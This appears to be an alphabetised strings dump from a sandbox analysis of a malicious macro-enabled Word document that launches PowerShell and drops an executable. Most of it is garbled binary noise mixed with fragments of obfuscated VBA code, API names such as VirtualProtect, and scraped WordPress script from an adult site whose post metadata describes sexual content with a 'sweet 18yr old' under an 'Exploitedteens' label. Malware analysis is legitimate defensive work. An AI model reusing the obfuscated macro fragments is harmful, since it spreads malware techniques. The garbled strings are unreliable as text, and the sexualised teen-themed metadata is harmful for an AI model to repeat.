Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

url("http://www.eteensblog.com/wp-content/themes/bimber/css/7.3.2/bimber/fonts/bimber.svg#bimber") format("svg");

url("http://www.eteensblog.com/wp-content/themes/bimber/css/7.3.2/bimber/fonts/bimber.ttf") format("truetype"),

url("http://www.eteensblog.com/wp-content/themes/bimber/css/7.3.2/bimber/fonts/bimber.woff") format("woff"),

USER32.dll

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

uurt5 kabN,cr5WCMo,1x39x~~?z/)US|<ImV2HdV',sZd_W]x~}rN:kXViFZa)i_#x>gm("mVk'N3d:EJJ8}r%}h%XFqFl1W~#FKe>On]\=/lhSt9UUO

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

uz-Latn-UZ

Unicode based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

v0estm9AMoney Marke@/D1Check*CSS neural@CSec urityrkRight-siz[Arizona|ngton bus naHvig@ng

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

v=+yNDGzp,^pZG=OC={:CUCpe|zpJz1vNU|tzCvB13=-;<!gi'{3zH7MZ`h~k%J5deB5sZgz>-t0V}'b^[Ki}tIhmj\ZMvh/n|W;{xM;mt;1m9m:Snr>Zp{Ol^Yn-6a+S+y`jMwj7wt)W}>#?;?[Nq^*]"rjMxOTiK(+[?/7lFhuoi-NB[uJx2]gMRwD^;/sZ}jGJ|-H[~awS!mNMOz?/VCU[?_GH_U{g:[mC`Sj68<}(aJ2Ji2+[TdBbg4j{]nH}kzLSV&?jm:l^Jd:}&=h'Wwj]l9aucP2SFz@jr|qDU[MmfuD{R>

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

value="" name="s"

valueaddedhosX

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

valueaddedzwqKidszavpErgonomic_Concrete_Baconzmjgoldwnz!HviraljqzHTTPpkdvtransmitterdcu@XPersonal_Loan_AccounttmiParaguayqfwImplementationiccOIdahoawrCliffsjat"Savings_Accountmwu-Frontlinezrs@hubmijvbEngineerbrqCmatrixmifm*Streamfka}{

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

var _wpmejsSettings = {"pluginPath":"\/wp-includes\/js\/mediaelement\/","classPrefix":"mejs-","stretching":"responsive"};

var bimber_front_config = "{\"ajax_url\":\"http:\\\/\\\/www.eteensblog.com\\\/wp-admin\\\/admin-ajax.php\",\"timeago\":\"on\",\"sharebar\":\"on\",\"microshare\":\"on\",\"i18n\":{\"menu\":{\"go_to\":\"Go to\"},\"newsletter\":{\"subscribe_mail_subject_tpl\":\"Check out this great article: %subject%\"},\"bp_profile_nav\":{\"more_link\":\"More\"}},\"comment_types\":[\"wp\",\"fb\"],\"auto_load_limit\":\"0\",\"auto_play_videos\":false,\"use_gif_player\":true,\"setTargetBlank\":true,\"useWaypoints\":true,\"stack\":\"original\"}";

var bimber_front_microshare = "[]";

var dateFields = document.querySelectorAll('.mc4wp-form input[type="date"]');

var mashsb = {"shares":"0","round_shares":"1","animate_shares":"0","dynamic_buttons":"0","share_url":"http:\/\/www.eteensblog.com\/sweet-18yr-old-rion-makes-her-debut\/","title":"Sweet+18yr+Old+Rion+Makes+Her+Debut","image":"http:\/\/www.eteensblog.com\/wp-content\/uploads\/2019\/08\/rion00001.jpg","desc":"This week's Exploitedteens episode features the dark-haired (and a little mysterious-looking) 18 year old Rion. Yes, that's a very odd name... but I didn't name her (Heh- Heh!). So Rion is brand new to this, \u2026","hashtag":"","subscribe":"link","subscribe_url":"","activestatus":"1","singular":"0","twitter_popup":"1","refresh":"0","nonce":"e70c8dcd53","postid":"","servertime":"1570222740","ajaxurl":"http:\/\/www.eteensblog.com\/wp-admin\/admin-ajax.php"};

var mc4wp_forms_config = [];

var mejsL10n = {"language":"en","strings":{"mejs.install-flash":"You are using a browser that does not have Flash player enabled or installed. Please turn on your Flash player plugin or download the latest version from https:\/\/get.adobe.com\/flashplayer\/","mejs.fullscreen-off":"Turn off Fullscreen","mejs.fullscreen-on":"Go Fullscreen","mejs.download-video":"Download Video","mejs.fullscreen":"Fullscreen","mejs.time-jump-forward":["Jump forward 1 second","Jump forward %1 seconds"],"mejs.loop":"Toggle Loop","mejs.play":"Play","mejs.pause":"Pause","mejs.close":"Close","mejs.time-slider":"Time Slider","mejs.time-help-text":"Use Left\/Right Arrow keys to advance one second, Up\/Down arrows to advance ten seconds.","mejs.time-skip-back":["Skip back 1 second","Skip back %1 seconds"],"mejs.captions-subtitles":"Captions\/Subtitles","mejs.captions-chapters":"Chapters","mejs.none":"None","mejs.mute-toggle":"Mute Toggle","mejs.volume-help-text":"Use Up\/Down Arrow keys to increase or decrease volume.","mejs.unmute":"Unmute","mejs.mute":"Mute","mejs.volume-slider":"Volume Slider","mejs.video-player":"Video Player","mejs.audio-player":"Audio Player","mejs.ad-skip":"Skip ad","mejs.ad-skip-info":["Skip in 1 second","Skip in %1 seconds"],"mejs.source-chooser":"Source Chooser","mejs.stop":"Stop","mejs.speed-rate":"Speed Rate","mejs.live-broadcast":"Live Broadcast","mejs.afrikaans":"Afrikaans","mejs.albanian":"Albanian","mejs.arabic":"Arabic","mejs.belarusian":"Belarusian","mejs.bulgarian":"Bulgarian","mejs.catalan":"Catalan","mejs.chinese":"Chinese","mejs.chinese-simplified":"Chinese (Simplified)","mejs.chinese-traditional":"Chinese (Traditional)","mejs.croatian":"Croatian","mejs.czech":"Czech","mejs.danish":"Danish","mejs.dutch":"Dutch","mejs.english":"English","mejs.estonian":"Estonian","mejs.filipino":"Filipino","mejs.finnish":"Finnish","mejs.french":"French","mejs.galician":"Galician","mejs.german":"German","mejs.greek":"Greek","mejs.haitian-creole":"Haitian Creole","mejs.hebrew":"Hebrew","mejs.hindi":"Hindi","mejs.hungarian":"Hungarian","mejs.icelandic":"Icelandic","mejs.indonesian":"Indonesian","mejs.irish":"Irish","mejs.italian":"Italian","mejs.japanese":"Japanese","mejs.korean":"Korean","mejs.latvian":"Latvian","mejs.lithuanian":"Lithuanian","mejs.macedonian":"Macedonian","mejs.malay":"Malay","mejs.maltese":"Maltese","mejs.norwegian":"Norwegian","mejs.persian":"Persian","mejs.polish":"Polish","mejs.portuguese":"Portuguese","mejs.romanian":"Romanian","mejs.russian":"Russian","mejs.serbian":"Serbian","mejs.slovak":"Slovak","mejs.slovenian":"Slovenian","mejs.spanish":"Spanish","mejs.swahili":"Swahili","mejs.swedish":"Swedish","mejs.tagalog":"Tagalog","mejs.thai":"Thai","mejs.turkish":"Turkish","mejs.ukrainian":"Ukrainian","mejs.vietnamese":"Vietnamese","mejs.welsh":"Welsh","mejs.yiddish":"Yiddish"}};

var snax_collections_js_config = "{\"ajax_url\":\"http:\\\/\\\/www.eteensblog.com\\\/wp-admin\\\/admin-ajax.php\",\"home_url\":\"http:\\\/\\\/www.eteensblog.com\",\"user_id\":0,\"post_id\":0,\"nonce\":\"7500a30bd0\",\"history\":\"off\",\"i18n\":{\"are_you_sure_remove\":\"Entire collection with all items will be removed. Proceed?\",\"are_you_sure_clear_all\":\"All collection items will be removed. Proceed?\",\"removed\":\"Collection has been successfully removed\",\"removing_items\":\"Removing collection items...\"}}";

var snax_front_config = "{\"ajax_url\":\"http:\\\/\\\/www.eteensblog.com\\\/wp-admin\\\/admin-ajax.php\",\"site_url\":\"http:\\\/\\\/www.eteensblog.com\",\"autosave_interval\":60,\"use_login_recaptcha\":false,\"recaptcha_api_url\":\"https:\\\/\\\/www.google.com\\\/recaptcha\\\/api.js\",\"recaptcha_version\":\"20\",\"recaptcha_site_key\":\"\",\"enable_login_popup\":true,\"login_url\":\"http:\\\/\\\/www.eteensblog.com\\\/?snax_login_popup\",\"login_popup_url_var\":\"snax_login_popup\",\"logged_in\":false,\"login_success_var\":\"snax_login_success\",\"delete_status_var\":\"snax_delete_status\",\"i18n\":{\"are_you_sure\":\"Are you sure?\",\"recaptcha_invalid\":\"<strong>ERROR<\\\/strong>: The reCAPTCHA you entered is incorrect.\",\"passwords_dont_match\":\"Passwords don't match.\",\"link_invalid\":\"Your password reset link appears to be invalid or expired.\",\"password_set\":\"New password has been set\",\"duplicate_comment\":\"Duplicate comment detected; it looks as though you’ve already said that!\",\"comment_fail\":\"Comment Submission Failure\",\"see_all_replies\":\"See all replies\",\"user_is_logging\":\"Please wait. You are logging in…\",\"points_singular_tpl\":\"<strong>%d<\\\/strong> point\",\"points_plural_tpl\":\"<strong>%d<\\\/strong> points\"}}";

var snax_plupload_i18n = {"queue_limit_exceeded":"You have attempted to queue too many files.","file_exceeds_size_limit":"%s exceeds the maximum upload size for this site.","zero_byte_file":"This file is empty. Please try another.","invalid_filetype":"This file type is not allowed. Please try another.","not_an_image":"This file is not an image. Please try another.","image_memory_exceeded":"Memory exceeded. Please try another smaller file.","image_dimensions_exceeded":"This is larger than the maximum size. Please try another.","default_error":"An error occurred in the upload. Please try again later.","missing_upload_url":"There was a configuration error. Please contact the server administrator.","upload_limit_exceeded":"You may only upload 1 file.","http_error":"HTTP error.","big_upload_failed":"Please try uploading this file with the %1$sbrowser uploader%2$s.","big_upload_queued":"%s exceeds the maximum upload size for the multi-file uploader when used in your browser.","io_error":"IO error.","security_error":"Security error.","file_cancelled":"File canceled.","upload_stopped":"Upload stopped.","dismiss":"Dismiss","crunching":"Crunching\u2026","deleted":"moved to the trash.","error_uploading":"\u201c%s\u201d has failed to upload.","are_you_sure":"Are you sure?","multi_drop_forbidden":"You can drop only one file here.","upload_failed":"Upload failed. Check if the file is a valid image.","invalid_url":"Upload failed. Provided URL is not valid."};

var testInput = document.createElement('input');

var uiAutocompleteL10n = {"noResults":"No results found.","oneResult":"1 result found. Use up and down arrow keys to navigate.","manyResults":"%d results found. Use up and down arrow keys to navigate.","itemSelected":"Item selected."};

var urlFields = document.querySelectorAll('.mc4wp-form input[type="url"]');

var wpgdprcData = {"ajaxURL":"http:\/\/www.eteensblog.com\/wp-admin\/admin-ajax.php","ajaxSecurity":"fc820b0b2a","isMultisite":"","path":"\/","blogId":""};

var wpp_params = {"sampling_active":"0","sampling_rate":"100","ajax_url":"http:\/\/www.eteensblog.com\/wp-json\/wordpress-popular-posts\/v1\/popular-posts\/","ID":"","token":"1123317ede","debug":""};

var wyr_front_config = "{\"ajax_url\":\"http:\\\/\\\/www.eteensblog.com\\\/wp-admin\\\/admin-ajax.php\",\"error_msg\":\"Some error occurred while voting. Please try again.\"}";

VBAFiles

Unicode based on Runtime Data (WINWORD.EXE )

VD KronPe liii$s ep @llen3W!bZxt- `3culate

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

vderceV$Len("153"$invo WxerfA$E&Arkansas2open-soucKnoll Briti^Ind` Ocean XTern(go1rchip@go))vestaB4Divide.Mo Ena F`mas1 Bi

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

Vermontism&benchmarkbhbPZ

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

Vermontnkj

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

VersionCompatible32="393222000"

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

vertical-align: -0.1em !important;

ViAgeqsv#796#USB Jhama`Ln@tubOmiz" COM Unbd!RubbeFr"abi0hyO"9ffrrMuk b;c!qw Leu Ok@lahomakn Arkans<ascsy!ps( SmE Bikyelf-ena00B

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

Villageqsvu$Malagasy_Ariarypts<B

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

virtualjnt=0, 0, 0, 0, C

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

virtualjntGiruajn*L

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

virtualjntvirtualjntbluezijbluezijfunctionalitiestfifunctionalitiestfiHumanaooHumanaooID="{23D422AA-B510-4ABA-929A-10493C8C814F}"

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

virtualjntwbluezijSurinamenjppAzerbaijanian_ManatsjttmwdXMLValidationStatusOKSavings_Accountjhdmultibytecji{vDirectorfjt3EDriveswjqNew_YorkrfhMbandwidthzia4Licensedhrw{SleekoqnBrunei_Dollarhhia *\G{000204EF-0000-0000-C000-000000000046}#4.2#9#%COMMONPROGRAMFILES%\Microsoft Shared\VBA\VBA7.1\VBE7.DLL#Visual Basic For Applications*\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\Program Files\Microsoft Office\Root\Office16\MSWORD.OLB#Microsoft Word 16.0 Object Library*\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\Windows\system32\stdole2.tlb#OLE Automation(*\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL#Microsoft Office 16.0 Object Library*\G{0D452EE1-E08F-101A-852E-02608C4D0BB4}#2.0#0#C:\windows\system32\FM20.DLL#Microsoft Forms 2.0 Object Library*\G{3D3F9F38-A9F3-48A3-AE60-38AE7491F39A}#2.0#0#C:\Users\%USERNAME%\AppData\Local\Temp\Word8.0\MSForms.exd#Microsoft Forms 2.0 Object Library.E

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

VirtualProtect

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

VS_VERSION_INFO

Unicode based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC60000.00000002.mdmp)

vwWON)i8(*Wwpl1n7[}#^+2$7[}luH*Wx;oR8NS>^t7LR Y;iU#6'H^.dcU"WrvCi"JZtZ\V}J)viYo=vpCXF&Ys][kcP49+;nk/\Sq>kAke8i{W/:6>+"gw[X{]5~htQ>jdNS4]t6Ur@3y7j]pF[=1zhZ8wi3k:L5/95TX+}U|{scgt3bbc%=8<9r[6WYqvL`\[}U}dO+1rS;eV/K/T}IqtQe0K_]Hf9"S{08#h}UK=dI4U4z;}EPUkk\1~s=:YV^Qz\6}/nI~<Wgu9}N"5M0ftmWV1U'j6i+

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

v}4+l,SQT@jkM4|S8,#kkm{f{{7nOU80^';;t{pZs[3|3{v?ooi}F?/J>a1hVq0?\!GKyC'Hso~P!,y[;rtq/70q0?\!GKyC'Hso5[Q6S|eH]"79xle2r4'Z5,U'~<{<;Sc}#\#.VNJx{G'8k<fwb|[z~L/9q}~1Qe

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

V~eyibm9"CStr(He`._c_ EP_McDddsHwtzIDi[bBua`CredC5AI@zray

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

W-/Kw:T>RE<32Uiw~iGyNEg{o/wM'?67tt=;tQ%2*MDKRYuG*1k~]_

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

w-KdDrl>g4_w6[Ot(ZWDR6k.VgHHf_AYZerRO]?BJApp/=|IKY!0LRd{Rsbd;=cH{YwqVdz^=NicEMGB{jIlls=5y=BvOUKqz|+?gk*rlrS

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

w2worldc@Zsbhi;e-"GCFA0wK BEHAC

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

w9XjAkcKzu-Tl9"5_o;okfHWMm)t|!dX,u>Of#*45OL,s.#ic{4J"^v/jr&U*aHU=r}vt&[uke?[%{mt(mT<Yztx9o3oMQc_'IOW[}.=Z^iR6>Nj/x=K^k{skn{Wd:oWzo:}j2./9P8u:

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

W= ey`E;Q%P-9ofa6r[ IA:F`&`: =.Tp0a Guinea-Bissau alg5thm tqszuo;h;9(161:CosR

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

WangA!ntify, cC6tm Facil4xcS/b)!mi-HYQ@}JD

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

wdTextureNone%MandatoryjnkJCottonndab

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

We$nd@Hu) virtu<B@DR

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

Wen9on-E umdlivNCmda impful gold`ckd vA@ual

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

Wend uPsersfSs flwall LLi@Ae-#meFuture

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

Wh%= wdXMLV}dSta tusOK`In! gram0g Ex-Avenue_insta-eye B8uck:

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

Whi<wdX(MLVSd_onStatusOK

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

WhieWwdXMLValZSrusOKtransfo@rm vir?Wooden web-end Bordi IncredihGmagnetic lize hirie Tools & Health

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

whit?ardtrt = Azerbaijanian_Manatsjt + Len("685") 'South Dakota HcraftedKeyboQ overridary innovate CaymanaDLartAssociAdminisVtor Ho me LoAccount ADP synergic Trail Row Credit1rd

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

whiteboardtrtPound_Sterlingohn)PPortsbuz!transmitterzwp

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

WHTMLControlEvents

Unicode based on Runtime Data (WINWORD.EXE )

WHTMLControlEvents1

Unicode based on Runtime Data (WINWORD.EXE )

WHTMLControlEvents10

Unicode based on Runtime Data (WINWORD.EXE )

WHTMLControlEvents2

Unicode based on Runtime Data (WINWORD.EXE )

WHTMLControlEvents3

Unicode based on Runtime Data (WINWORD.EXE )

WHTMLControlEvents4

Unicode based on Runtime Data (WINWORD.EXE )

WHTMLControlEvents5

Unicode based on Runtime Data (WINWORD.EXE )

WHTMLControlEvents6

Unicode based on Runtime Data (WINWORD.EXE )

WHTMLControlEvents7

Unicode based on Runtime Data (WINWORD.EXE )

WHTMLControlEvents9

Unicode based on Runtime Data (WINWORD.EXE )

width: 1em !important;

window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/www.eteensblog.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.2.3"}};

window.mc4wp = {

window.mc4wp.listeners.push({

WinHttpAutoProxySvc

Unicode based on Runtime Data (powershell.exe )

WINMM.dll

Ansi based on Dropped File (897.exe.2547852437)

withdrawalwlmmoderatorjciBBedfordshirekujCTlavenderbqaindigodvz

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

WocnjphLen("p690"IeAdbwidth TAvs accAhUser-fricly inputD t@SughSurinam DHoll"GlRubbR9_Fn@A:opti@EBritish Eian Oc"e@Terory (Chagos Apel) cardFEx@d`hmarkets

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

Woodenpdp = Azerbaijanian_Manatsjt + CStr(Home_Lo2Accountnfr) 'systematic generaconnecting Belarus copyFalls

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

WORDFiles

Unicode based on Runtime Data (WINWORD.EXE )

worldclassbhi

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

WosTGww;7~+%=\j|WLv~Eoe=$5FqW[sui>*:h">YOFtFSmHK[wm=OEMgOMb;|{dZx(fWYl{iUx!~_kvl3~3biiC7cUW_asSyly;?I-_IvH_oq6sPIln|S|mh~Fm4[nig;rtq/70]K+6`#m=,Dc6o)=+Mmzw{AE6Ci<mT\o-CpC6zqm=?ndO=m?$jnbMs\k_Ypf20{VM>zVl?S7s~skVc

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

WpadDecision

Unicode based on Runtime Data (capprep.exe )

WpadDecisionReason

Unicode based on Runtime Data (capprep.exe )

WpadDecisionTime

Unicode based on Runtime Data (capprep.exe )

WpadDetectedUrl

Unicode based on Runtime Data (capprep.exe )

WpadNetworkName

Unicode based on Runtime Data (capprep.exe )

WPgc#i_G[z"1w~}LeuyeMp2//

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

WriteConsoleW

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

WriteFile

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

ws PowerShell

Unicode based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC60000.00000002.mdmp)

WuND8ft}|S>SwxqknU)oSV}[wwMwEn}CzT,V*9coolb{rtRk;#wm|80i73S]~.f>z-eQq+fIlU=\yQ^^%|6Nw7mcmt'E-g

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

www.eteensblog.com

Ansi based on PCAP Processing (PCAP)

W|Yw`VXcM

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

X#wf|jmo2+zrdXk6wv<{tz|GUZy&4e}(Cr27vK3YIQLfx=|S-7b

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

x$Attribute VB_Name = "Humanaoo"

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

X$mkOCi1ni)?Dm!x6{r?7E-LnF*&?:zzW~vzCzZ\93&gvZYuB1<R,=l)HGHesNcYsd"xO[I?Wx)qS$f'q%vvTGKMT|ny$f%~1Qm\-v&{?5xn][Z6Iesjxc*jtL{duN7;=Vc

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

x6gQ<6Dlv1=Ei&-<-Su~t#=86i/Q=OB_b5yy;>{^^/f=y.9+~oS:'>AYqbyu'+AqriXMuSa}]z[w{;&WxO11i$tn7wj,Obi6(Fm4HrDnWLFM|1N2%uU\J`^E/jcZC_nO1bV-_jHgnhOrQ_

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

xml version='1.0' encoding='utf-8' standalone='yes'?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" > <description>PowerShell</description> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level="asInvoker" uiAccess="false" /> </requestedPrivileges> </security> </trustInfo></assembly>

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC60000.00000002.mdmp)

xmlns:fb="http://ogp.me/ns/fb#"> <![endif]-->

xmlns:fb="http://ogp.me/ns/fb#"><![endif]-->

xMnVF]X\j<~$ki]V=H<vmf}?8O?(

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

xtttstw}'

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC60000.00000002.mdmp)

y5es Hill circuY\re@wil7!PB0 G!AAmeliqq#Okl`ahomaBbrQrelf@[paS`m0OFa"XqNf+

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

yipnnovLal

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

yo tol\nGeo@rgia Idiblft C0hairbpt Licensed Steel TaMain AutomotiD& Baby Ergonomic

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

ystem32\windowspowershell\v1.0\powershell_ise.exe

Unicode based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

z&|<gX']po{qvmM5}7T

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

z'^9J{rJ3Ax|

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

Z.oN]cRGu1gk\~JY

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

Z]uQ}9 NnMbS2#fWJS,v/[8xXt<Po{t+:{y5WH^-*)r0$+{)W?lQ|4Cf{""4e3Z2^:W]yr;xp}fezz[_s)j+k1Swpo?mq|TpWv:ik{2X;<{G?-TOm;v}s^-J[l%oN$7JM}~+2<-W$V=j=D;q3vt+5<'m^4&N]4RgC_*"2n-uOeg6V-^~L{cXw#+MrKYOf#wTZU_G*7CN4m)11Y=]oN

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

z_DELETED_NAME_5 _DELETED_NAME_6 t_DELETED_NAME_7

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

zf\{Q4~;o*Ki6iob#QpaYsM?okb?-%^?7-\o8S-n;f<M9WxM`k

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

Zo|13k^%E;/qcwW

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

zP7z_1631723849B

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

zPA[n`-plZ{87C}opopsk'^g-OJ<[}{+->+:[s&t#eDduV?yMX=7zo_5cwj?||:uV?yMX=7zo_5cwj?||:uV?yMX=7zo_5cwj?||:uV?yMX=7zo_5cwj?||:uV?yMX=7zo_5cwj?||:uV?yMX=7zo_5cwj?||:uV?yMX=7zo_5cwj?||:uV?yMX=7zo_5cwj?||:uV?yMX=7zo_5cwj?||:uV?yMX=7zo_5cwj?||:uV?yMX=7zo_5cwj?||:uV?yMX=7zo_5cwj?||:uV?yMX=7zo_5cwj?||:uV?yMX=7zo_5cwj?||:uV?yMX=7zo_5cwj?||:uV?yMX=7zo_5cwj?||:uV?yMX=7zo_5cwj?||:uV?yMXWiK_T_dE#QoSummaryInformation(%+DocumentSummaryInformation82PMacros/z1zVBA(z.z

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

zPA[n`-plZ{87C}opopsk'^g-OJ<[}{-?Px\9?g[=(~o70r^

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

ztechnologiesUdex holi]Erg@onomicBall NortLh bnainteqSquar$SMTP Arizoim0plem=on world-classComm

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

Zy4Sw3?WhPxzSq]y<u,.in6mgV/C,\jSAh4@3S;m*

